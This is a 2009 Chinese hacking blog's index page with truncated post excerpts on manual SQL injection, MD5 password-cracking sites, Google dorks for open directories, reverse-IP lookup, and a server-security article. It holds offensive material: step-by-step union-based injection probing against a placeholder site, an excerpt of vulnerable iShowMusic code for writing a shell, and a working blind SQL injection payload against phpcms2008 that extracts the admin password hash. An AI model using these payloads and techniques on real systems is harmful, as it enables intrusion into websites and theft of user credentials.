23 四 09 php手工注入语句使用
PHP手工注入使用
比如黑客找到注入点是:http://www.xxx.tk/news.php?id=300数据库类型是mssql2005.要用union查询,先确定有几个字段,使用order by 来完成,就是:http://www.xxx.tk/news.php?id=300 order by 7– 回显正常
http://www.xxx.tk/news.php?id=300 order by 8– 回显失败
说明总共7个字段,然后用null填充
http://www.xxx.tk/news.php?id=300 union all select null,null,null,null,null,null,null–显示正常 (全文…)
Tags: 黑客
22 四 09 IP反查域名多了个选择IP邻居
IP邻居
IP反查域名的网站我介绍了很多,而且还根据效果做了排名.今天给大家介绍的IP邻居这个网站不仅反查量大,而且还显示同IP站点的PR值,百度和谷歌的收录量.目前国内IP反查域名站点在数据量和功能上无出其右,国外站点的速度又不敢恭维.所以P9强烈推荐大家使用IP邻居反查域名.网址:http://www.iplinju.com/更多IP反查域名站点请参看介绍几个同ip地址反查域名的网站这篇日志.
Tags: 黑客
19 四 09 一个新的md5密码破解站
新的md5密码破解站
随着cmd5.com的部分md5密码破解收费,p9就致力于寻找新的md5密码破解站,今天这个是具有120G数据的md5破解新站http://www.t00ls.net/tools/md5/其它免费md5破解站请参看md5破解收费了咋办这篇博文!
Tags: 黑客
18 四 09 利用google突破各种封锁和一些特殊命令
google突破搜索
在搜索框上输入: “index of/ ” inurl:lib
再按搜索你将进入许多图书馆,并且一定能下载自己喜欢的书籍。
在搜索框上输入: “index of /” cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口!
在搜索框上输入: “index of /” ppt
再按搜索你就可以突破网站入口下载powerpint作品!
在搜索框上输入: “index of /” mp3 (全文…)
Tags: 黑客
06 四 09 md5破解收费了咋办
md5破解站www.cmd5.com收费有一段时间了,它是黑客比较喜欢的md5破解站,以前我也挺喜欢cmd5的可惜它收费了.有时候密码破解出来,却提示你要付费才能获得,每次付费5毛钱.不得已我转到了www.xmd5.com这个站我也搞不清楚是国人办的还是外国人办的,它目前是除了cmd5以外数据量最大的一家md5破解站,希望xmd5不要像cmd5那样也收费了,不然以后只能靠手工破解了.另外还有几家md5破解站我就也顺便把网址给大家吧http://md5.mmkey.com/ http://gdataonline.com/seekhash.php
http://www.hashchecker.com/?_sls=search_hash
最后一个比较特殊它是在线暴露破解的http://www.milw0rm.com/md5/info.php
Tags: 黑客
04 四 09 波波虎服务器遭黑客攻击下午5点恢复
波波虎网络家庭影院被黑
网上流行的波波虎家庭影院服务器遭黑客攻击截止目前仍然没有恢复,波波虎官方发布消息说4月4日下午也就是今天下午5点恢复.本站也有介绍波波虎家庭影院想下载波波虎的请点这里
Tags: 黑客
04 四 09 服务器常见安全管理漏洞
企业信息化技术的应用,以不可逆转。随着文件服务器、ERP管理软件等等在企业中生根发芽,应用服务器也逐渐在企业中普及起来。以前在企业中有一台应用服务器已经是了不起的事情,现在有两台、三台的,也不为怪了。 但是,企业应用服务器虽然增加了,可是对这个应用服务器的安全管理,却跟不上。随便到一家企业看看,总是可以看到一些明显的安全管理漏洞。下面笔者就把其中一些典型的漏洞列举出来,就当作抛砖引玉,提醒大家注意服务器的安全管理防止黑客。
一、所有主机可以Telnet到服务器。
由于服务器往往都放在一个特定的空间中,若对于服务器的任何维护工作,如查看服务器的硬盘空间等等,这些工作都需要到服务器上面去查看的话,很明显不是很
服务器常见安全管理漏洞
方便。我们希望能够在我们平时用的电脑上就可以对服务器进行一些日常的维护,而不用跑到存放服务器的房间中去。
所以,我们对于服务器的大部分维护工作,都可以通过Telnet到服务器上,以命令行的方式进行维护。这无疑为我们服务器的管理提供了一个方便的管理渠道,但是,也给服务器带来了一些隐患。
当非法攻击者利用某些特定的方法知道Telent的用户名与密码之后,就可以在企业任何一台主机上畅通无阻的访问服务器。 (全文…)
Tags: 黑客
23 三 09 myipneighbors恢复ip反查域名了
myipneighbors
今天偶然在打开myipneighbors的时候发现ip反查域名恢复服务了,期盼了好几个月终于等到myipneighbors恢复了,我试着查了一下发现功能没以前缺少了一些.这个网站我在3月7号的介绍几个同ip地址反查域名的网站这篇文章中介绍过.
Tags: 黑客
22 三 09 iShowMusic V1.2 直接写shell漏洞
安全
iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==”save”){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg(“no”,”你还未选择歌曲呢!”,”返回重新填 (全文…)
16 三 09 phpcms2008-0day ask/search_ajax.php注入漏洞
安全
作者:nuke
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
测试方法:
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
